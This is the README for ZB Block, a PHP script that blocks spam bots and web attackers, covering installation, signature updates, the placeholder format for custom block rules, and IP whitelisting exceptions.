ZB BLOCK
(Short for Zaphod B. Blocker)
Copyright 2008,2009 by Zaphodb777 under GPL V. 2.0
(Free to use, free to copy, free to modify, free to distribute, just give me credit when you do so!)

REQUIRES: PHP on your server!
BACK UP YOUR SITE/FILES BEFORE TRYING

This script is designed to detect certian behaviors detrimental to websites (MySQL hacks, forum spam,
and much more),or known bad addresses attempting to access your website (more than 100 million
checked).. It then will send the bad robot (usually) or hacker to a descriptive 403 after a ~25 second
wait to prevent flooding.!

Script and Signature Updates are available at http://www.spambotsecurity.com/zbblock.php

Forum for this software is at http://www.spambotsecurity.com/forum

This script should work without modification on any PHP equipped webserver, and MySQL is not needed.

*** TO INSTALL ***

Load http://www.yoursite.tld/zbblock/setup.php

Follow instructions.

*** TO USE ***

To use, place the line seen at the end of install at the top of, or as near as you can to the top of
your .php pages you wish to protect.

Script WILL NOT WORK with plain html!

Script will not protect anything that has been sent, or manipulated before it's inclusion (such as
MySQL operations). So place it in the page as high as you can.


*** IF SCRIPT DOES NOT WORK ***
SOME servers foul the root directory name of the server.

If that is case, then change the contents of vault/directory.php line above to point at the zbblock
directory. Example:

C:/xAmp/xampp/htdocs/zbblock

*** TO UPDATE SIGNATURES ***

Go to http://www.spambotsecurity.com/zbblock.php
Download the new signature file.
Overwrite the signatures.inc in your /vault/

Simple no?

*** TO ADD YOUR OWN CUSTOM SIGNATURES ***

FIRST: Please put all custom signatures in customsig.inc in the vault! This system was made so
main signatures could be left alone, and updated without worry.

SECOND: Remember, if you write a bypass, since the signatures are in a locked subdirectory of your site
no one will know what that bypass is, unless your friend transgresses in some other way. SO, if you make
a bypass...
  A. Monitor your logs for your friend fouling up. (and exposing the bypass)
  B. Change it often.
  C. As with all things GPL I don't take any responsibility for this program whatsoever!

THIRD: Remember to make a backup copy of your custom signatures under another filename,
so when the main program is updated, you will be able to restore your customs (if still compatible)!

FOURTH: Do not forget to report them at http://zaphodb777.dyndns.org/forum if they prove useful!

 FORMAT IS...
$ax = $ax + ([type of match]([variable to be searched],"[pattern]","[what is the reason for the check]"));

[type of match] can be:
* lmatch:  Check for a match at the left side of the variable only. (Good for Singular IPs)
* rmatch:  Check for a match at the right side of the variable only. (Good for hostnames)
* inmatch: Check for a match anywhere in the variable to be searched.

[variable to be searched] should be:
$address     : The IP address of the client.
$hoster      : The Hostname of the client.
$loaded      : File that was loaded on your machine, lowercased.
$pathinfo    : Binary T/F as to whether the client sent a path in the URL.
$query2      : The raw query of the URL used. (use for case sensitive matches)
$query       : The lowercased query of the URL used. (use for non-case sensitive matches)
$querydec    : The lowercased and decoded (removal of %## garbage) query of the URL used.
               (use to catch "cloaked" attack strings)
$requesturi  : The whole of the request on your webserver.
$pathinfo    : True (1) if pathing of your files was attempted (remote include attack).
$rawpost     : Post data client sent.
$fromhost    : Referrer.
               (DON'T RELY ON THIS, IT CAN BE CLOAKED, USE AS SUPPLEMENTAL!)
$useragent   : Name/Type of client accessing you.
               (DON'T RELY ON THIS, IT CAN BE CLOAKED, USE AS SUPPLEMENTAL!)
$lcuseragent : Lowercased Name/Type of client accessing you.
               (DON'T RELY ON THIS, IT CAN BE CLOAKED, USE AS SUPPLEMENTAL!)


[pattern] what part of the URL sent to your machine is indicitave of an attack?

[what is the reason for the check] Give explanation of why if found this block acts.

* Special IP range match.

$ax = $ax + (iprange($address,"[low ip]","[high ip]","[host/reason]"));

[low ip]  : Classic quadot (www.xxx.yyy.zzz) beginning of range IP address. 
[high ip] : Classic quadot (www.xxx.yyy.zzz) end of range IP address.
[host/reason] what is blocked by range, and why.

Remove above comments to line "// format is..." for a very small speed boost.

Not mentioned in the file itself, you can cause any match to invert for the sake of special exceptions/bypasses
by changing:

$ax = $ax +
to
$ax = $ax -

Which is useful for letting a single friend's IP through an IP range block, or whatever.
ax must be 0 or lower than 0 to allow a client to access!

Keep in mind that the less checking (find commonality in attacks) that you do, the faster this script will finish!

*** END OF DOCS ***
(phew!)

If you have any problems, bugs, suggestions for new inclusions into the blocking signatures, or
ideas for improvement, please come to http://www.spambotsecurity.com/forum/index.php and say so!

Thanks for trying it out, and I hope to hear from you soon!

EOF